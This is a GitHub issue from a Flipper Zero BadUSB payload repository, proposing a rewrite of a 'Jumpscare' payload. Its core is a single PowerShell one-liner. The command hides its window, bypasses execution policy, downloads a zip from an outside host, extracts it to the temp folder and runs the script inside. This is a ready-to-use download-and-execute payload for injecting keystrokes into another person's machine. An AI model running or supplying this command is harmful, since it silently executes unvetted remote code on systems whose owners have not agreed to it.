I-Am-Jakoby / Flipper-Zero-BadUSB

Repository for my flipper zero badUSB payloads. Now almost entirely plug and play.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Jumpscare 2.0 enhancement

UNC0V3R3D opened this issue · comments

commented

I believe that using clear and descriptive variable names can help new users better understand the purpose and function of the script.

Therefore i rewrote the script a bit:

powershell -UseBasicParsing -w h -NoP -NonI -Ep Bypass;$TempPath="$env:tmp";Invoke-WebRequest -Uri 'https://jakoby.lol/kiv' -OutFile "$TempPath\js.zip";Expand-Archive "$TempPath\js.zip" -DestinationPath $TempPath -Force;. "$TempPath\js\js.ps1"